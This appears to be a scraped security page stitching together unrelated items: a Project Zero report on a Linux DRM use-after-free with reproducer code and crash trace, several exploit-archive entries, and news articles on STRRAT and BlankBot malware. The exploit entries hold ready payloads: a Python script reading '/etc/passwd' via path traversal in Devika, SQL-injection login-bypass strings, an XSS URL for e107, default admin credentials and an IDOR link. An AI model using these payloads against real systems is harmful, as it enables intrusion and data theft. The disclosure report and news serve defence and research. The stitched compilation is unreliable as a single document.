Linux DRM has drm_file_update_pid() call to get_pid() too late, which creates a race condition that can lead to use-after-free issue of a struct pid.

Linux: DRM: refcount incremented too late in drm_file_update_pid()

[I am sending this to security@ and to the drm-misc maintainers - based on https://drm.pages.freedesktop.org/maintainer-tools/committer-drm-misc.html#merge-criteria I think this falls into drm-misc's area of responsibility?]

=== summary ===  
drm_file_update_pid() calls get_pid() too late, which creates a race  
condition that can lead to use-after-free of a `struct pid`.

I will send a suggested patch off-list in a minute; let me know if you want me to resend it on the dri-devel list in case that works better for you.

=== verbose bug report ===  
drm_file_update_pid() contains the following code:

```  
  struct drm_device *dev;  
  struct pid *pid, *old;

  /*  
   * Master nodes need to keep the original ownership in order for  
   * drm_master_check_perm to keep working correctly. (See comment in  
   * drm_auth.c.)  
   */  
  if (filp->was_master)  
          return;

  pid = task_tgid(current);

  [...]

  dev = filp->minor->dev;  
  mutex_lock(&dev->filelist_mutex);  
  old = rcu_replace_pointer(filp->pid, pid, 1);  
  mutex_unlock(&dev->filelist_mutex);

  if (pid != old) {  
          get_pid(pid);  
          synchronize_rcu();  
          put_pid(old);  
  }  
```

filp->pid is a refcounted pointer which can only be modified under  
dev->filelist_mutex.  
After calling rcu_replace_pointer(), we have a refcount debt of 1, which is  
still fine because we're holding the mutex that prevents other tasks from  
taking ownership of the reference stored in filp->pid; but by the time we drop  
this mutex, we must have called get_pid() to make up for this refcount debt,  
and that isn't done.

So a use-after-free can occur in the following scenario, assuming filp->pid  
initially points to the pid of process A and process B's initial pid refcount  
is 1:

process A               process B  
=========               =========  
                        begin drm_file_update_pid  
                        mutex_lock(&dev->filelist_mutex)  
                        rcu_replace_pointer(filp->pid, <pid B>, 1)  
                        mutex_unlock(&dev->filelist_mutex)  
begin drm_file_update_pid  
mutex_lock(&dev->filelist_mutex)  
rcu_replace_pointer(filp->pid, <pid A>, 1)  
mutex_unlock(&dev->filelist_mutex)  
get_pid(<pid A>)  
synchronize_rcu()  
put_pid(<pid B>)   *** pid B reaches refcount 0 and is freed here ***  
                        get_pid(<pid B>)   *** UAF ***  
                        synchronize_rcu()  
                        put_pid(<pid A>)

Note that this race can only occur if RCU is configured so that  
running in preemptible task context can count as an RCU quiescent state.  
My testcase assumes that the kernel is configured for full preemption (meaning  
either CONFIG_PREEMPT=y or CONFIG_PREEMPT_DYNAMIC=y with full preemption  
selected at boot time); however, I think in theory the bug can probably be  
hit as long as CONFIG_PREEMPT_RCU=y is enabled (which is the case on kernel  
builds with dynamic preemption), since I think on such builds, expedited grace  
periods can still detect RCU quiescent states with IPIs.

My reproducer also requires that you patch the following code into the kernel  
to slow down execution and make the bug easy to trigger:

```  
diff --git a/drivers/gpu/drm/drm_file.c b/drivers/gpu/drm/drm_file.c  
index 638ffa4444f5..03e7711e9744 100644  
--- a/drivers/gpu/drm/drm_file.c  
+++ b/drivers/gpu/drm/drm_file.c  
@@ -38,6 +38,7 @@  
 #include <linux/pci.h>  
 #include <linux/poll.h>  
 #include <linux/slab.h>  
+#include <linux/delay.h>

 #include <drm/drm_client.h>  
 #include <drm/drm_drv.h>  
@@ -472,6 +473,12 @@ void drm_file_update_pid(struct drm_file *filp)  
        old = rcu_replace_pointer(filp->pid, pid, 1);  
        mutex_unlock(&dev->filelist_mutex);

+       if (strcmp(current->comm, \"SLOWME\") == 0) {  
+               pr_warn(\"%s: BEGIN DELAY\  
\", __func__);  
+               mdelay(1000);  
+               pr_warn(\"%s: END DELAY\  
\", __func__);  
+       }  
+  
        if (pid != old) {  
                get_pid(pid);  
                synchronize_rcu();  
```

The reproducer code:  
```  
#include <unistd.h>  
#include <stdio.h>  
#include <err.h>  
#include <fcntl.h>  
#include <stdlib.h>  
#include <sys/signal.h>  
#include <sys/ioctl.h>  
#include <sys/prctl.h>  
#include <sys/wait.h>  
#include <drm/drm.h>

#define SYSCHK(x) ({          \\  
  typeof(x) __res = (x);      \\  
  if (__res == (typeof(x))-1) \\  
    err(1, \"SYSCHK(\" #x \")\"); \\  
  __res;                      \\  
})

static void main_test_code() {  
  struct drm_version dummy_version;

  int drm_fd = SYSCHK(open(\"/dev/dri/renderD128\", O_RDONLY));  
  int child = SYSCHK(fork());

  if (child == 0) {  
    /* child process */  
    prctl(PR_SET_NAME, \"SLOWME\");  
    ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version); // delay injected here  
  } else {  
    /* parent process */  
    usleep(200*1000);  
    ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version);  
  }

  if (child == 0) {  
    /* child process */  
    exit(0);  
  } else {  
    /* parent process */  
    int status = 0;  
    pid_t child = wait(&status);  
    printf(\"wait() returned %d, status %d\  
\", child, status);  
    exit(0);  
  }  
}

int main(void) {  
  // run in a child process to avoid extra references from job control or such  
  int child = SYSCHK(fork());  
  if (child == 0) {  
    prctl(PR_SET_PDEATHSIG, SIGKILL);  
    main_test_code();  
  } else {  
    int status = 0;  
    pid_t child = wait(&status);  
    printf(\"wait() returned %d, status %d\  
\", child, status);  
  }  
}  
```

The resulting KASAN splat (tested on mainline plus the race widener patch  
above, with CONFIG_PREEMPT=y and CONFIG_KASAN=y):  
```  
 ==================================================================  
 BUG: KASAN: slab-use-after-free in drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4))  
 Write of size 4 at addr ffff88811f2f68c0 by task SLOWME/1092

 CPU: 3 PID: 1092 Comm: SLOWME Not tainted 6.10.0-rc5-00035-gafcd48134c58-dirty #384  
 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014  
 Call Trace:  
  <TASK>  
 dump_stack_lvl (lib/dump_stack.c:117)  
 print_report (mm/kasan/report.c:378 mm/kasan/report.c:488)  
 kasan_report (mm/kasan/report.c:603)  
 kasan_check_range (mm/kasan/generic.c:175 (discriminator 1) mm/kasan/generic.c:189 (discriminator 1))  
 drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4))  
 drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737)  
 drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842)  
 __x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898)  
 do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))  
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)  
[...]  
  </TASK>

 Allocated by task 1091:  
 kasan_save_stack (mm/kasan/common.c:48)  
 kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1))  
 __kasan_slab_alloc (mm/kasan/common.c:312 mm/kasan/common.c:338)  
 kmem_cache_alloc_noprof (./include/linux/kasan.h:201 mm/slub.c:3940 mm/slub.c:4002 mm/slub.c:4009)  
 alloc_pid (kernel/pid.c:187)  
 copy_process (kernel/fork.c:2406)  
 kernel_clone (./include/linux/random.h:26 kernel/fork.c:2798)  
 __do_sys_clone (kernel/fork.c:2929)  
 do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))  
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)

 Freed by task 1091:  
 kasan_save_stack (mm/kasan/common.c:48)  
 kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1))  
 kasan_save_free_info (mm/kasan/generic.c:582 (discriminator 1))  
 poison_slab_object (mm/kasan/common.c:242)  
 __kasan_slab_free (mm/kasan/common.c:256 (discriminator 1))  
 kmem_cache_free (mm/slub.c:4438 (discriminator 3) mm/slub.c:4513 (discriminator 3))  
 put_pid.part.0 (kernel/pid.c:122)  
 drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737)  
 drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842)  
 __x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898)  
 do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))  
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)

 The buggy address belongs to the object at ffff88811f2f68c0  
  which belongs to the cache pid of size 240  
 The buggy address is located 0 bytes inside of  
  freed 240-byte region [ffff88811f2f68c0, ffff88811f2f69b0)

 The buggy address belongs to the physical page:  
 page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11f2f6  
 head: order:1 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0  
 flags: 0x200000000000040(head|node=0|zone=2)  
 page_type: 0xffffefff(slab)  
 raw: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000  
 raw: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000  
 head: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000  
 head: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000  
 head: 0200000000000001 ffffea00047cbd81 ffffffffffffffff 0000000000000000  
 head: 0000000000000002 0000000000000000 00000000ffffffff 0000000000000000  
 page dumped because: kasan: bad access detected

 Memory state around the buggy address:  
  ffff88811f2f6780: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
  ffff88811f2f6800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fc fc  
 >ffff88811f2f6880: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb  
                                            ^  
  ffff88811f2f6900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
  ffff88811f2f6980: fb fb fb fb fb fb fc fc fc fc fc fc fc fc fc fc  
 ==================================================================  
```

=== disclosure deadline ===  
This bug is subject to a 90-day disclosure deadline. If a fix for this  
issue is made available to users before the end of the 90-day deadline,  
this bug report will become public 30 days after the fix was made  
available. Otherwise, this bug report will become public at the deadline.  
The scheduled deadline is 2024-09-25.

For more details, see the Project Zero vulnerability disclosure policy:  
https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-  
policy.html

Related CVE Numbers: CVE-2024-39486.

Found by: jannh@google.com

Linux DRM drm_file_update_pid() Race Condition / Use-After-Free

Devika version 1 suffers from a path traversal vulnerability.

    # Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter# Google Dork: N/A# Date: 2024-06-29# Exploit Author: Alperen Ergel# Contact: @alpernae (IG/X)# Vendor Homepage: https://devikaai.co/# Software Link: https://github.com/stitionai/devika# Version: v1# Tested on: Windows 11 Home Edition# CVE: CVE-2024-40422#!/usr/bin/pythonimport argparseimport requestsdef exploit(target_url):    url = f'http://{target_url}/api/get-browser-snapshot'    params = {        'snapshot_path': '../../../../etc/passwd'    }    response = requests.get(url, params=params)    print(response.text)if __name__ == "__main__":    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)    args = parser.parse_args()    exploit(args.target)

Devika 1 Path Traversal

e107 version 2.3.3 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : e107 v2.3.3 XSS Vulnerability                                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://unlimited.dl.sourceforge.net/project/e107/e107/e107%20v2.3.3/e107_2.3.3_full.zip?viasf=1                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1[+] LOgin : http://127.0.0.1/233/e107_admin/[+] http://127.0.0.1/233/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

e107 2.3.3 Cross Site Scripting

Codeprojects E-Commerce version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Codeprojects E-Commerce v1.0 Insecure Settings Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://code-projects.org/?s=Ecommerce                                                                                      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin@admin.com & pass = password[+] https://www/127.0.0.1/demo/comdeptcmru.acth/59143214/admin/products.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Codeprojects E-Commerce 1.0 Insecure Settings

Blog Site version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Blog Site 1.0 Auth By Pass Vulnerability                                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/blog-site-using-php_0.zip                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1//blog/admin/index.php?page=manage_postGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Blog Site 1.0 SQL Injection

Best Courier Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Best Courier Management System v1.0 Auth By Pass Vulnerability                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user : 'or''='@gmail.com & pass = 'or''='[+] Panel : http://127.0.0.1/gaatitrack/login.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Best Courier Management System 1.0 SQL Injection

Appointment Scheduler version 4.0 suffers from an insecure direct object reference vulnerability.

    =============================================================================================================================================| # Title     : Appointment Scheduler v4.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743                                          |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport[+] http://127.0.0.1/AppointmentSchedulerDe/index.php?controller=pjAdminBookings&action=pjActionExportGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Appointment Scheduler 4.0 Insecure Direct Object Reference

Organizations in Kazakhstan are the target of a threat activity cluster dubbed Bloody Wolf that delivers a commodity malware called STRRAT (aka Strigoi Master).
"The program selling for as little as $80 on underground resources allows the adversaries to take control of corporate computers and hijack restricted data," cybersecurity vendor BI.ZONE said in a new analysis.
The cyber attacks employ

Network Security / Threat Intelligence

Organizations in Kazakhstan are the target of a threat activity cluster dubbed **Bloody Wolf** that delivers a commodity malware called STRRAT (aka Strigoi Master).

"The program selling for as little as $80 on underground resources allows the adversaries to take control of corporate computers and hijack restricted data," cybersecurity vendor BI.ZONE said in a new analysis.

The cyber attacks employ phishing emails as an initial access vector, impersonating the Ministry of Finance of the Republic of Kazakhstan and other agencies to trick recipients into opening PDF attachments.

The file purports to be a non-compliance notice and contains links to a malicious Java archive (JAR) file as well as an installation guide for the Java interpreter necessary for the malware to function.

In an attempt to lend legitimacy to the attack, the second link points to a web page associated with the country's government website that urges visitors to install Java in order to ensure that the portal is operational.

The STRRAT malware, hosted on a website that mimics the website of the Kazakhstan government ("egov-kz\[.\]online"), sets up persistence on the Windows host by means of a Registry modification and runs the JAR file every 30 minutes.

What's more, a copy of the JAR file is copied to the Windows startup folder to ensure that it automatically launches after a system reboot.

Subsequently, it establishes connections with a Pastebin server to exfiltrate sensitive information from the compromised machine, including details about operating system version and antivirus software installed, and account data from Google Chrome, Mozilla Firefox, Internet Explorer, Foxmail, Outlook, and Thunderbird.

It's also designed to receive additional commands from the server to download and execute more payloads, log keystrokes, run commands using cmd.exe or PowerShell, restart or shut down the system, install a proxy, and remove itself.

"Using less common file types such as JAR enables the attackers to bypass defenses," BI.ZONE said. "Employing legitimate web services such as Pastebin to communicate with the compromised system makes it possible to evade network security solutions."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Kazakh Organizations Targeted by 'Bloody Wolf' Cyber Attacks

A list of topics we covered in the week of July 29 to August 4 of 2024

August 2, 2024 - The FBI warns about scammers that impersonate employees of cryptocurrrency exchanges as a means to defraud victims

July 31, 2024 - Meta has settled a Texas lawsuit over gathering biometric data for Facebook's "Tag Suggestions" feature without informed consent.

July 31, 2024 - Apple has released security updates that patch vulnerabilities in Siri and VoiceOver that could be used to access sensitive user data.

July 30, 2024 - Only trust official sources they say, but what happens when a Google vetted ad is for a Google product?

July 29, 2024 - This week on the Lock and Code podcast, we speak with Jess Dodson about SIEM selection, management, and proper data collection.

 A week in security (July 29 &#8211; August 4) 

Cybersecurity researchers have discovered a new Android banking trojan called BlankBot targeting Turkish users with an aim to steal financial information.
"BlankBot features a range of malicious capabilities, which include customer injections, keylogging, screen recording and it communicates with a control server over a WebSocket connection," Intel 471 said in an analysis published last week.

Mobile Security / Financial Security

Cybersecurity researchers have discovered a new Android banking trojan called BlankBot targeting Turkish users with an aim to steal financial information.

"BlankBot features a range of malicious capabilities, which include customer injections, keylogging, screen recording and it communicates with a control server over a WebSocket connection," Intel 471 said in an analysis published last week.

Discovered on July 24, 2024, BlankBot is said to be undergoing active development, with the malware abusing Android's accessibility services permissions to obtain full control over the infected devices.

The names of some of the malicious APK files containing BlankBot are listed below -

*   app-release.apk (com.abcdefg.w568b)
*   app-release.apk (com.abcdef.w568b)
*   app-release-signed (14).apk (com.whatsapp.chma14)
*   app.apk (com.whatsapp.chma14p)
*   app.apk (com.whatsapp.w568bp)
*   showcuu.apk (com.whatsapp.w568b)

Like the recently resurfaced Mandrake Android trojan, BlankBot implements a session-based package installer to circumvent the restricted settings feature introduced in Android 13 to block sideloaded applications from directly requesting dangerous permissions.

"The bot asks the victim to allow installing applications from the third-party sources, then it retrieves the Android package kit (APK) file stored inside the application assets directory with no encryption and proceeds with the package installation process," Intel 471 said.

The malware comes with a wide range of features to perform screen recording, keylogging, and inject overlays based on specific commands received from a remote server to harvest bank account credentials, payment data, and even the pattern used to unlock the device.

BlankBot is also capable of intercepting SMS messages, uninstalling arbitrary applications, and gathering data such as contact lists and installed apps. It further makes use of the accessibility services API to prevent the user from accessing device settings or launching antivirus apps.

"BlankBot is a new Android banking trojan still under development, as evidenced by the multiple code variants observed in different applications," the cybersecurity company said. "Regardless, the malware can perform malicious actions once it infects an Android device."

The disclosure comes as Google outlined the various steps it's taking to combat threat actors' use of cell-site simulators like Stingrays to inject SMS messages directly into Android phones, a fraud technique referred to as SMS Blaster fraud.

"This method to inject messages entirely bypasses the carrier network, thus bypassing all the sophisticated network-based anti-spam and anti-fraud filters," Google said. "SMS Blasters expose a fake LTE or 5G network which executes a single function: downgrading the user's connection to a legacy 2G protocol."

The mitigation measures include a user option to disable 2G at the modem level and turn off null ciphers, the latter of which is an essential configuration for a False Base Station in order to inject an SMS payload.

Earlier this May, Google also said it's stepping up cellular security by alerting users if their cellular network connection is unencrypted and if criminals are using cell-site simulators to snoop on users or send them SMS-based fraud messages.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#google